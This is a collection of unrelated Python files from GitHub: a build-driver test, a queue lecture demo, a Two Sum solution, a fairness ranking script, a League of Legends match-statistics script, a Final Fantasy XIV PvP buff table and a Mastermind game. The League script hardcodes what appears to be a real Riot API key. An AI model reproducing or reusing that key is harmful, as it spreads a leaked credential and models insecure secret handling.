Simple(e3.anod.spec.Anod):\n\n @e3.anod.spec.Anod.primitive()\n def download():\n pass\n\n with pytest.raises(e3.anod.spec.AnodError):\n anod_instance = Simple(\n qualifier='', kind='build')\n anod_instance.sandbox = None\n e3.anod.driver.AnodDriver(\n anod_instance=anod_instance,\n store=None).activate(sandbox, None)\n\n sandbox.root_dir = os.getcwd()\n anod_instance = Simple(\n qualifier='', kind='build')\n anod_instance.sandbox = sandbox\n driver = e3.anod.driver.AnodDriver(\n anod_instance=anod_instance,\n store=None)\n\n assert driver.call('why') is False\n with pytest.raises(e3.anod.spec.AnodError) as err:\n driver.download()\n\n assert '.activate() has not been called' in str(err)\n\n\ndef test_deps_driver():\n class Deps(e3.anod.spec.Anod):\n build_deps = [e3.anod.spec.Anod.Dependency(name='parent')]\n\n @e3.anod.spec.Anod.primitive()\n def build(self):\n return self.deps['parent'].parent_info\n\n sandbox = e3.anod.sandbox.SandBox()\n sandbox.root_dir = os.getcwd()\n anod_instance = Deps(qualifier='', kind='build')\n anod_instance.sandbox = sandbox\n\n spec_dir = os.path.join(os.path.dirname(__file__), 'data')\n spec_repo = e3.anod.loader.AnodSpecRepository(spec_dir)\n\n e3.anod.driver.AnodDriver(\n anod_instance=anod_instance,\n store=None).activate(sandbox, spec_repo)\n\n anod_instance.build_space.create()\n assert anod_instance.build() == 'from_parent'\n","repo_name":"AnnaKaczorowski/e3-core","sub_path":"tests/tests_e3/anod/test_driver.py","file_name":"test_driver.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"35849983419","text":"\"\"\"\n Garfield Maitland\n CS 5001\n 11/21/2023\n Lecture - protocol.py\n\"\"\"\n\nfrom Square import Square\nfrom Circle import Circle\nfrom Queue import Queue\n\n\ndef main():\n q = Queue()\n q.enqueue(Square(1))\n q.enqueue(Square(2))\n q.enqueue(Circle(1))\n q.enqueue(Square(5))\n\n print(q.front())\n print(q.back())\n\n print(\"------------\\n\")\n\n while not q.is_empty():\n print(q.front())\n print(q.dequeue().get_area())\n\n print(\"Done\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"gmaitland/CS_5001","sub_path":"Lecture/November_21/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"28113529885","text":"from typing import List\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n # Dictionaries allow lookup in O(n) because they are\n # implemented using hash tables.\n values = {}\n\n for i, value in enumerate(nums):\n # Make use of the fact that target - value equals\n # the value you're looking for.\n if target - value in values:\n return [values[target - value], i]\n else:\n # When said value is not found, add it to\n # the dictionary so you can check next iteration.\n values[value] = i\n\n\nsolution = Solution()\n","repo_name":"denivic/LeetCodeSolutions","sub_path":"(1) - Easy Problems/(1) - Two Sum/Python/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"12110434860","text":"import csv\n\nimport pandas as pd\nimport numpy as np\nimport operator\nimport math\ndef sort_dict(dict_, reverse=True):\n return dict(sorted(dict_.items(), key=operator.itemgetter(1), reverse=reverse))\nclass Ranking:\n @staticmethod\n def rank(data, data2):\n print(data.columns)\n\n # feature_set = set(['race', 'sex', 'age', 'hours-per-week', 'capital-gain', 'capital-loss'])\n # feature_list = ['race', 'sex', 'age', 'hours-per-week', 'capital-gain', 'capital-loss'] #list(feature_set)\n feature_list = ['sex', 'age', 'thalach', 'ca', 'thal', 'exang', 'cp', 'trestbps', 'restecg', 'fbs', 'oldpeak',\n 'chol'] # list(feature_set)\n # feature_list = ['race', 'sex', 'age', 'hours-per-week', 'capital-gain', 'capital-loss'] #list(feature_set)\n #feature_list = ['sex','age','health','Pstatus','nursery','Medu', 'Fjob', 'schoolsup', 'absences', 'activities', 'higher', 'traveltime', 'paid', 'guardian', 'Walc', 'freetime', 'famsup', 'romantic', 'studytime', 'goout', 'reason', 'famrel', 'internet']\n # feature_list = [ 'Sex', 'Age','Job', 'Saving', 'Checking', 'Credit','Housing', 'Purpose']\n feature_list = ['race','sex', 'age', 'c_charge_degree', 'priors_count']\n #feature_list = ['age', 'education', 'job', 'loan', 'balance', 'housing', 'duration', 'campaign', 'default']\n\n\n Swap = data['Swap \\n Percentage'].values\n Measurement = data.Measurement.values\n Feature = data.Feature.values\n SUM_COMBINED = data.SUM_COMBINED.values\n CDI = data.CDI.values\n\n Test_Percent = data2['Test \\n Percentage'].values\n Feature2 = data2.Feature.values\n Shap_Value = data2.Value.values\n\n data_file = open(path_output2 + 'Ranking-value-{}.csv'.format(data_name),\n mode='w', newline='',\n encoding='utf-8')\n data_writer = csv.writer(data_file)\n data_writer.writerow(['Distance_Measure','Feature', 'Distance_Rank', 'Shap_Rant', 'Difference'])\n\n data_file2 = open(path_output2 + 'Stability-shap-{}.csv'.format(data_name),\n mode='w', newline='',\n encoding='utf-8')\n data_writer2 = csv.writer(data_file2)\n data_writer2.writerow(['Measures','Rank_CDI_SHAP', 'Rank_Double_SHAP'])\n set_Measurement = ['Hellinger\\n distance', 'Jensen-Shannon\\n divergence', 'Total variation\\n distance',\n 'Wasserstein\\n distance'] # set(Measurement)\n\n rank_data_shap = {}\n for i in range(len(Feature2)):\n if Test_Percent[i] == '50%':\n rank_data_shap[Feature2[i]] = Shap_Value[i]\n prev_shap = -1\n rank_index = 0\n rank_data_shap2 = {}\n sorted_data_shap = sort_dict(rank_data_shap, reverse=True)\n for key, val in sorted_data_shap.items():\n if val != prev_shap:\n rank_index += 1\n rank_data_shap2[key] = rank_index\n\n rank_data = {}\n rank_data_ = {}\n for i in range(len(Feature)):\n if Swap[i] == '50%':\n if Measurement[i] in rank_data.keys():\n rank_data[Measurement[i]][Feature[i]] = SUM_COMBINED[i]\n rank_data_[Measurement[i]][Feature[i]] = CDI[i]\n else:\n rank_data[Measurement[i]] = {}\n rank_data[Measurement[i]][Feature[i]] = SUM_COMBINED[i]\n\n rank_data_[Measurement[i]] = {}\n rank_data_[Measurement[i]][Feature[i]] = CDI[i]\n #print(Swap)\n #for measure_2 in set_Measurement:\n rank_data2_ = {}\n for key, val in rank_data_.items():\n sorted_data = sort_dict(val, reverse=True)\n #print(key, sorted_data)\n rank_data2_[key] = {}\n index = 0\n prev_val = -1\n for key2, val2 in sorted_data.items():\n if val2 != prev_val:\n prev_val = val2\n index += 1\n rank_data2_[key][key2] = index\n\n rank_data2 = {}\n\n for key, val in rank_data.items():\n sorted_data = sort_dict(val, reverse=True)\n #print(key, sorted_data)\n rank_data2[key] = {}\n index = 0\n prev_val = -1\n for key2, val2 in sorted_data.items():\n if val2 != prev_val:\n prev_val = val2\n index += 1\n rank_data2[key][key2] = index\n Feature_set = set(Feature)\n m = len(Feature_set)\n print(set_Measurement)\n\n for measure_1 in set_Measurement:\n #val = rank_data.get(measure_1)\n row = [measure_1]\n val_ = []\n sum_rank = 0\n sum_rank_single = 0\n for key2 in feature_list:\n val2 = rank_data[measure_1][key2]\n #for key2, val2 in rank_data[measure_1].items():\n sum_rank += (math.pow((rank_data2[measure_1][key2] - rank_data_shap2[key2]), 2)) / (\n m * (math.pow(m, 2) - 1))\n sum_rank_single += (math.pow((rank_data2_[measure_1][key2] - rank_data_shap2[key2]), 2)) / (\n m * (math.pow(m, 2) - 1))\n data_writer.writerow([measure_1, key2, rank_data2[measure_1][key2], rank_data_shap2[key2], abs((rank_data2[measure_1][key2] - rank_data_shap2[key2]))])\n row.append(1 - round(sum_rank_single,3))\n row.append(1 - round(sum_rank,3))\n data_writer2.writerow(row)\n\n\nif __name__ == '__main__':\n path = '../../../dataset/'\n alpha = 0.3\n #clevelan_heart\n data_name = 'compas-{}_'.format(alpha) # _35_threshold\n path_output = 'logging3/{}/'.format(data_name)\n path_output2 = '/Volumes/Cisco/Fall2022/Fairness/Analysis/Ranking/Shap/'\n data = pd.read_csv(path+path_output +'/processed'+'/Correlated_features_{}.csv'.format(data_name))\n data2 = pd.read_csv(path + path_output + '/processed' + '/Shap_importance_{}.csv'.format(data_name))\n ranking = Ranking.rank(data, data2)","repo_name":"openjamoses/Data-swapping","sub_path":"src/models/v4/analysis/ranking/Rank_measures_shap_importance.py","file_name":"Rank_measures_shap_importance.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37588917809","text":"\r\nfrom re import S\r\nfrom riotwatcher import LolWatcher, ApiError\r\nimport pandas as pd\r\nimport json\r\nimport pprint\r\nfrom os.path import exists\r\nfrom pathlib import Path\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.ticker as mticker \r\n# golbal variables\r\napi_key = 'RGAPI-9945c54d-8e0f-4e0f-929c-4abe631c6e74'\r\nwatcher = LolWatcher(api_key)\r\nmy_region = 'na1'\r\n\r\n\r\nwith open('summoners.json') as f:\r\n data = json.load(f)\r\nkeys = data.keys()\r\nvalues = data.values()\r\n\r\nsummoner_ids = {'challenger' : [],\r\n'grandmaster' : [],\r\n'master' : [],\r\n'diamond' : [],\r\n'platinum' : [],\r\n'gold' : [],\r\n'silver' : [],\r\n'bronze' : [],\r\n'iron' : []}\r\nif not exists('summoner_ids.json'):\r\n for key in summoner_ids.keys():\r\n summoners = data[key]\r\n for summoner in summoners:\r\n summoner_ids[key].append(watcher.summoner.by_name(my_region, summoner)['puuid'])\r\n with open('summoner_ids.json','w') as f:\r\n json.dump(summoner_ids,f)\r\nelse:\r\n with open('summoner_ids.json') as f:\r\n summoner_ids = json.load(f)\r\n\r\ngame_times = {'challenger' : [],\r\n'grandmaster' : [],\r\n'master' : [],\r\n'diamond' : [],\r\n'platinum' : [],\r\n'gold' : [],\r\n'silver' : [],\r\n'bronze' : [],\r\n'iron' : []}\r\n\r\nmatch_list = {'challenger' : [],\r\n'grandmaster' : [],\r\n'master' : [],\r\n'diamond' : [],\r\n'platinum' : [],\r\n'gold' : [],\r\n'silver' : [],\r\n'bronze' : [],\r\n'iron' : []}\r\nif not exists('match_list.json'):\r\n for key in match_list.keys():\r\n ids = summoner_ids[key]\r\n for id in ids:\r\n match_list[key].append(watcher.match.matchlist_by_puuid('americas',id,0,50,420))\r\n with open('match_list.json','w') as f:\r\n json.dump(match_list,f)\r\nelse:\r\n with open('match_list.json') as f:\r\n match_list = json.load(f)\r\n\r\nif not exists('game_times.json'):\r\n for key in game_times.keys():\r\n match_ids = match_list[key]\r\n for ids in match_ids:\r\n for id in ids:\r\n print(id)\r\n game_times[key].append(watcher.match.by_id('americas', id)['info']['participants'][0]['timePlayed'])\r\n with open('game_times.json','w') as f:\r\n json.dump(game_times,f)\r\nelse:\r\n with open('game_times.json') as f:\r\n game_times = json.load(f)\r\npositions = ['TOP','JUNGLE',\"MIDDLE\",'BOTTOM','UTILITY']\r\ngepp = {\r\n 'challenger' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'grandmaster' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'master' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'diamond' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'platinum' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'gold' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'silver' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'bronze' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n },\r\n'iron' : {\r\n 'TOP' : [],\r\n 'JUNGLE' : [],\r\n 'MIDDLE' : [],\r\n 'BOTTOM' : [],\r\n 'UTILITY' : []\r\n }\r\n}\r\npath = Path(r'matches')\r\nfiles = list(path.glob('NA1_??????????.json'))\r\nrecorded_id = []\r\nfor file in files:\r\n file_str = str(file)\r\n recorded_id.append(file_str[file_str.find('NA1'):file_str.find('NA1')+14])\r\n\r\n\r\n\r\nfor key in game_times.keys():\r\n match_ids = match_list[key]\r\n for ids in match_ids:\r\n for id in ids:\r\n \r\n if id not in recorded_id:\r\n print(id)\r\n match = watcher.match.by_id('americas', id)\r\n match['tier'] = key\r\n with open(str(path)+'\\\\'+id+'.json','w') as f:\r\n json.dump(match,f)\r\n f.close()\r\nfor file in files:\r\n with open(file,encoding='ascii') as f:\r\n match = json.load(f)\r\n for i in range(10):\r\n tier = match['tier']\r\n for position in positions:\r\n if position == match['info']['participants'][i]['teamPosition']:\r\n gold = match['info']['participants'][i]['goldEarned']\r\n time = match['info']['participants'][i]['timePlayed']\r\n gps = gold/time\r\n gepp[tier][position].append(gps)\r\n f.close()\r\n \r\n \r\n \r\n\r\ngps_avg = {\r\n 'challenger' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'grandmaster' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'master' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'diamond' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'platinum' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'gold' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'silver' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'bronze' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n },\r\n'iron' : {\r\n 'TOP' : 0,\r\n 'JUNGLE' : 0,\r\n 'MIDDLE' : 0,\r\n 'BOTTOM' : 0,\r\n 'UTILITY' : 0\r\n }\r\n}\r\n\r\nfor key in gps_avg.keys():\r\n for position in positions:\r\n total = 0\r\n for dict in gepp[key][position]:\r\n total += dict\r\n avg = total / len(gepp[key][position])\r\n gps_avg[key][position] = avg\r\n\r\n\r\n\r\ngame_time_avg = {'challenger' : 0,\r\n'grandmaster' : 0,\r\n'master' : 0,\r\n'diamond' : 0,\r\n'platinum' : 0,\r\n'gold' : 0,\r\n'silver' : 0,\r\n'bronze' : 0,\r\n'iron' : 0}\r\ntotal = 0\r\nfor key in game_times.keys():\r\n for time in game_times[key]:\r\n total += time\r\n avg = round((total / len(game_times[key])))\r\n game_time_avg[key] = [avg,f'{avg//60}m {avg%60}s']\r\n \r\n total = 0\r\ntiers = ['challenger', 'grandmaster', 'master', 'diamond', 'platinum', 'gold','silver','bronze','iron']\r\ngpss = {}\r\n# for tier in tiers:\r\n# print(tier + \": \"+game_time_avg[tier][1])\r\nfor position in positions:\r\n print(position + ':\\n')\r\n gpss[position]=[]\r\n for tier in tiers[::-1]:\r\n print(' '+ tier + ': '+str(gps_avg[tier][position]))\r\n gpss[position].append(gps_avg[tier][position])\r\n print('\\n')\r\n\r\nfig, ax = plt.subplots() \r\nplt.figure(1) \r\nfor key in gpss.keys():\r\n plt.plot([item.upper() for item in tiers[::-1]],gpss[key],label = key)\r\nplt.xticks(rotation=90)\r\n\r\nplt.xlabel('Divisions')\r\nplt.ylabel('Gold Per Second')\r\nplt.title('GPS for different divisions')\r\nplt.legend()\r\nplt.tight_layout()\r\nplt.figure(2)\r\n\r\ngame_time_avg_list = []\r\ngame_time_avg_listf = []\r\nfor tier in tiers[::-1]:\r\n game_time_avg_list.append(game_time_avg[tier][0])\r\n game_time_avg_listf.append(game_time_avg[tier][1])\r\nplt.bar([item.upper() for item in tiers[::-1]],game_time_avg_list)\r\nplt.xticks(rotation=90)\r\nplt.xlabel('Divisions')\r\nplt.ylabel('Game time')\r\nplt.title('Average game time for different divisions')\r\n# plt.yticks(game_time_avg_listf)\r\nprint(game_time_avg_list)\r\ndef minsecs(x,pos=None):\r\n return f'{int(x//60)}m {int(x%60)}s'\r\nplt.ylim(1500,1850)\r\nplt.gca().yaxis.set_major_formatter(mticker.FuncFormatter(minsecs))\r\nplt.legend()\r\nplt.tight_layout()\r\n\r\nplt.show()","repo_name":"zealotwithcharge/hw_02","sub_path":"hw_02.py","file_name":"hw_02.py","file_ext":"py","file_size_in_byte":8078,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"43"} +{"seq_id":"42383385514","text":"mubiaozhiyebuzheng = { # 目标职业增伤补正\n 0: 1, # 好像是木桩\n 19: 0.7, # 'Paladin', # 骑士PLD\n 20: 0.7, # 'Monk', # 武僧MNK\n 21: 0.7, # 'Warrior', # 战士WAR\n 22: 0.75, # 'Dragoon', # 龙骑士DRG\n 23: 1, # 'Bard', # 吟游诗人BRD\n 24: 1, # 'WhiteMage', # 白魔法师WHM\n 25: 1, # 'BlackMage', # 黑魔法师BLM\n # 26: #'Arcanist', # 秘术师ACN\n 27: 1, # 'Summoner', # 召唤师SMN\n 28: 1, # 'Scholar', # 学者SCH\n 30: 0.75, # 'Ninja', # 忍者NIN\n 31: 1, # 'Machinist', # 机工士MCH\n 32: 0.7, # 'DarkKnight', # 暗黑骑士DRK\n 33: 1, # 'Astrologian', # 占星术士AST\n 34: 0.7, # 'Samurai', # 武士SAM\n 35: 0.8, # 'RedMage', # 赤魔法师RDM\n # 36: #'BlueMage', # 青魔BLM\n 37: 0.7, # 'Gunbreaker', # 绝枪战士GNB\n 38: 1, # 'Dancer', # 舞者DNC\n}\nzijizhiyebuzheng = { # 自己职业增伤补正\n 19: 1.15, # 'Paladin', # 骑士PLD\n 20: 1.15, # 'Monk', # 武僧MNK\n 21: 1.15, # 'Warrior', # 战士WAR\n 22: 1.15, # 'Dragoon', # 龙骑士DRG\n 23: 1, # 'Bard', # 吟游诗人BRD\n 24: 1, # 'WhiteMage', # 白魔法师WHM\n 25: 1, # 'BlackMage', # 黑魔法师BLM\n # 26: #'Arcanist', # 秘术师ACN\n 27: 1, # 'Summoner', # 召唤师SMN\n 28: 1, # 'Scholar', # 学者SCH\n 30: 1.15, # 'Ninja', # 忍者NIN\n 31: 1, # 'Machinist', # 机工士MCH\n 32: 1.15, # 'DarkKnight', # 暗黑骑士DRK\n 33: 1, # 'Astrologian', # 占星术士AST\n 34: 1.15, # 'Samurai', # 武士SAM\n 35: 1, # 'RedMage', # 赤魔法师RDM\n # 36: #'BlueMage', # 青魔BLM\n 37: 1.15, # 'Gunbreaker', # 绝枪战士GNB\n 38: 1, # 'Dancer', # 舞者DNC\n}\n\n# 目标的易伤buff\nmubiaozengshang10 = [\n 2035, # 天辉\n 2014, # 攻其不备\n 2077, # 狂魂\n 2078, # 混沌旋风\n 2019, # 毒菌冲击\n 2066, # 近战被枪刃抽取\n]\nmubiaozengshang20 = [\n 1896, # 幻影弹\n]\nmubiaozengshang25 = [\n 1408, # 法系LB\n]\n# 目标的减伤buff\nmubiaojianshang10 = [\n 2178, # 大地神的抒情恋歌\n 2038, # 节制群体buff\n 2034, # 占卜\n 2172, # 亲疏自行自身buff\n 2061, # 原初的勇猛\n 2062, # 原初的武猛\n 2052, # 扇舞·急\n 2177, # 策动\n 2006, # 金刚体势\n 2171, # 暗黑布道\n 2063, # 枪刃抽近融合\n]\nmubiaojianshang20 = [\n 1452, # 王冠之贵妇\n 2053, # 护盾\n 1978, # 铁壁\n]\nmubiaojianshang25 = [\n 655, # TLB\n]\nmubiaojianshang30 = [\n 2020, # 干预 没有铁壁附加效果只有20 但是两个buff是一样的 按高的算\n]\nmubiaojianshang50 = [\n 1240, # 必杀剑·地天\n # 抵消伤害的盾,我不会查盾值,先全当作50%减伤算\n # 1308, # 至黑之夜\n # 1997, # 残暴弹\n # 2179, # 掩护盾\n # 2011, # 缩地\n # 1993, # 摆脱\n # 2071, # 天星冲日\n # 2043, # 中间学派状态下奶出的盾\n # 2033, # 交剑\n # 1989, # 魔罩\n # 1331, # 鼓舞\n # 2008, # 金刚极意\n]\n# 自身的加伤害buff\nzijizengshang5 = [\n 2215, # 放浪神的小步舞曲\n]\nzijizengshang10 = [\n 2034, # 占卜\n 2022, # 剑舞\n 2005, # 红莲体势\n 1183, # 巨龙右眼 自身\n 1184, # 巨龙左眼 目标\n 2064, # 枪刃抽远融合\n]\nzijizengshang20 = [\n 1451, # 王冠之领主\n 2037, # 节制自己的buff\n]\n# 自身受到的减少伤害buff\nzijijianshang10 = [\n 2076, # 悔罪\n 2181, # 亲疏自行反弹buff\n 2067, # 远程被枪刃抽取\n]\nzijijianshang20 = [\n 2101, # 雪仇\n]\nzijijianshang40 = [\n 1988, # 昏乱\n]\n\n\n# 2282 鼓励 随时间衰减的10% 2173 2174 武僧义结金兰的两个buff不知道哪个是5%增伤 同时出现结束 而且只有物理增伤 这两个比较怪而且少见 先不管\n# 2185 牵制 不会查buff是不是自己上的 自己上没有增伤 先不管\n# 获取buff持续时间是\n# teffects[effect_id].timer\n# 获取buff来源是\n# teffects[effect_id].actorId\n\ndef get_buff(actor):\n # info(f\"{target.job.name\")\n # info(f\"{target.job.raw_value}\")\n # info(f\"{target.job.value()\")\n # info(f\"{data.effects}\")\n # info(f\"{target.effects.get_dict()}\")\n b = 1\n effect = actor.effects.get_dict()\n for i in range(2131, 2136):\n if i in effect:\n b += 0.1 * (i - 2130)\n break\n for i in zijizengshang5:\n if i in effect:\n b *= 1.05\n for i in zijizengshang10:\n if i in effect:\n b *= 1.1\n for i in zijizengshang20:\n if i in effect:\n b *= 1.2\n for i in zijijianshang10:\n if i in effect:\n b *= 0.9\n for i in zijijianshang20:\n if i in effect:\n b *= 0.8\n for i in zijijianshang40:\n if i in effect:\n b *= 0.6\n return b * 0.95\n\n\ndef get_tbuff(target): # 目标的有效生命\n c = 1\n c /= mubiaozhiyebuzheng[target.job.raw_value]\n teffects = target.effects.get_dict()\n if 1302 in teffects:\n return 0\n for i in mubiaozengshang10:\n if i in teffects:\n c /= 1.1\n for i in mubiaozengshang20:\n if i in teffects:\n c /= 1.2\n for i in mubiaozengshang25:\n if i in teffects:\n c /= 1.25\n for i in mubiaojianshang10:\n if i in teffects:\n c /= 0.9\n for i in mubiaojianshang20:\n if i in teffects:\n c /= 0.8\n for i in mubiaojianshang30:\n if i in teffects:\n c /= 0.7\n for i in mubiaojianshang50:\n if i in teffects:\n c /= 0.5\n\n return c\n","repo_name":"nyouoG/fpt_plugins","sub_path":"XivCombat2/PvpDmgBuff.py","file_name":"PvpDmgBuff.py","file_ext":"py","file_size_in_byte":5612,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"43"} +{"seq_id":"4048762983","text":"import gspread\nimport random\nfrom os import system\nimport sys\nimport time\nfrom google.oauth2.service_account import Credentials\nfrom colorama import Fore\nfrom operator import itemgetter\n\nSCOPE = [\n \"https://www.googleapis.com/auth/spreadsheets\",\n \"https://www.googleapis.com/auth/drive.file\",\n \"https://www.googleapis.com/auth/drive\"\n ]\n\nCREDS = Credentials.from_service_account_file('creds.json')\nSCOPED_CREDS = CREDS.with_scopes(SCOPE)\nGSPREAD_CLIENT = gspread.authorize(SCOPED_CREDS)\nSHEET = GSPREAD_CLIENT.open('score')\n\n\ncolor_list = ['Red', 'Green', 'Blue', 'Purple', 'Yellow', 'White', 'Cyan']\ncolor_list_map = {'R': 'Red', 'G': 'Green', 'B': 'Blue', 'P': 'Purple',\n 'Y': 'Yellow', 'W': 'White', 'C': 'Cyan'}\nunknown = []\nguess_code = []\nattempts = 8\ninput_store = {0: guess_code}\nclue = {0: [0, 0]}\nplayer_name = ''\nscore = 0\n\n\nclass Score:\n \"\"\"\n Class to store score details in spreadsheet\n \"\"\"\n def __init__(self, name, score, level):\n self.name = name\n self.score = score\n self.level = level\n\n def update(self):\n level_str = ''\n if self.level == 1:\n level_str = 'easy'\n elif self.level == 2:\n level_str = 'medium'\n elif self.level == 3:\n level_str = 'difficult'\n data = [self.name, self.score, level_str]\n score_sheet = SHEET.worksheet('score')\n score_sheet.append_row(data)\n\n\ndef reset_variables():\n \"\"\"\n Resets global variables when user wants to play again,\n aim is to not repeat or store incorrect values in spreadsheet\n \"\"\"\n global unknown\n unknown = []\n global guess_code\n guess_code = []\n global input_store\n input_store = {0: guess_code}\n global clue\n clue = {0: [0, 0]}\n\n\ndef clear_screen():\n \"\"\"\n Cleans sccreen\n \"\"\"\n system('clear')\n\n\ndef continue_to_main():\n \"\"\"\n This function takes back to main menu\n \"\"\"\n print(\"Press 'C' or 'c' to continue...\")\n while True:\n key = input('\\n')\n if (key.upper() == 'C'):\n main()\n break\n else:\n print(\"Invalid input, Try again!\")\n continue\n\n\ndef welcome_banner():\n \"\"\"\n Prints welcome heading on top of the screen\n \"\"\"\n welcome = '{:^80}'\n print(\"*\" * 80)\n print()\n print(Fore.RED + welcome.format(\"MASTERMIND - CODE BREAKER\")\n + Fore.RESET + '\\n')\n print(\"*\" * 80)\n\n\ndef player_namef():\n \"\"\"\n Takes username input\n \"\"\"\n name = '{:^80}'\n print('\\n\\n\\n')\n print(Fore.RED + name.format('Enter your first name:') + Fore.RESET)\n print(' '*37, end=\"\")\n global player_name\n while True:\n try:\n player_name = input()\n if not player_name.isalpha():\n raise ValueError(f\"Enter a valid name.\")\n else:\n break\n except ValueError as e:\n print(f\"Invalid input: {e}!\")\n return True\n\n\ndef create_color_code(color_list, choice):\n \"\"\"\n Creates the color code for user to guess\n \"\"\"\n if choice == 1:\n random_color_code = random.sample(color_list, k=3)\n elif choice == 2:\n random_color_code = random.sample(color_list, k=4)\n elif choice == 3:\n random_color_code = random.sample(color_list, k=5)\n append_unknown_list(choice)\n return random_color_code\n\n\ndef append_unknown_list(k):\n \"\"\"\n Appends '***' and '---' for the game board\n acocording to the user choice\n \"\"\"\n for i in range(2+k):\n unknown.append(\"***\")\n guess_code.append('---')\n\n\ndef game_board(unknown):\n \"\"\"\n Prints game board for the play\n \"\"\"\n welcome1 = '{:^80}'\n print(\"*\" * 80)\n print()\n print(Fore.RED + welcome1.format('GAME BOARD') + Fore.RESET + '\\n')\n print(\"*\" * 80)\n print(\"\\n\")\n for i in range(len(unknown)):\n unknown[i] = Fore.RED + str(unknown[i]) + Fore.RESET\n print(\"The secret Color code is: \", end=\"\")\n print(*unknown, sep=\" \")\n print()\n\n\ndef add_rank(j, rank, color):\n \"\"\"\n Add ranks to the updated scoreboard\n \"\"\"\n print(color + ' '*22, end=\"\")\n print(f\"{j[0]+rank:16}\", end=\"\")\n print(f\"{j[1]:<17}\", end=\"\")\n print(f\"{j[2]}\")\n\n\ndef leaderboard():\n \"\"\"\n Prints scoreboard(top 10) after a games is finished\n \"\"\"\n clear_screen()\n game_board = '{:^80}'\n print(\"*\" * 80)\n print()\n print(Fore.RED + game_board.format('SCOREBOARD') + Fore.RESET + '\\n')\n print(\"*\" * 80)\n print('\\n')\n score_sheet = SHEET.worksheet('score').get_all_values()\n score_sheet_headings = score_sheet[0]\n score_values = score_sheet[1:]\n for i in score_values:\n i[1] = int(i[1])\n new_ssh = ' '.join(score_sheet_headings).upper()\n underlined_text = \"\\x1B[4m\" + new_ssh + \"\\x1B[0m\"\n print(Fore.RED + underlined_text.center(90, ' ') + Fore.RESET + '\\n')\n sorted_list = sorted(score_values, key=itemgetter(1), reverse=True)\n for j in sorted_list[0:10]:\n if sorted_list.index(j) == 0:\n add_rank(j, '(1)', Fore.YELLOW)\n elif sorted_list.index(j) == 1:\n add_rank(j, '(2)', Fore.BLUE)\n elif sorted_list.index(j) == 2:\n add_rank(j, '(3)', Fore.GREEN)\n else:\n add_rank(j, '', Fore.RESET)\n continue_to_main()\n\n\ndef guess_attempts(attempts, unknown, color_passcode, choice):\n \"\"\"\n Prints attempts detail on the screen after each attempt\n made by the user\n \"\"\"\n count = 0\n flag = 0\n while True:\n game_board(unknown)\n for key in input_store:\n print(\" \"*10, end=\"\")\n print(f\"| Attempt: {key}\", end=\" \")\n print(f'Hits: {clue[key][0]}, Misses: {clue[key][1]}', end=\" \")\n dict_list = input_store[key]\n print(*dict_list, sep=\" \")\n if check_result(count, attempts, key, choice, color_passcode):\n pass\n count += 1\n if count == attempts+1:\n check_result(count, attempts, key, choice, color_passcode)\n color_input = take_input(count, choice)\n compare_colors(color_passcode, color_input, count)\n 